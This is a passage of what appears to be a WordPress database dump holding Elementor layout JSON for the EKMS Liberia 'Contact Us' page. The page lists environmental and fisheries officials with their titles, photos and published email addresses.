\\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23132,3345,'_elementor_edit_mode','builder'),(23133,3345,'_elementor_template_type','wp-page'),(23134,3345,'_elementor_version','3.0.16'),(23135,3345,'_wp_page_template','default'),(23136,3345,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false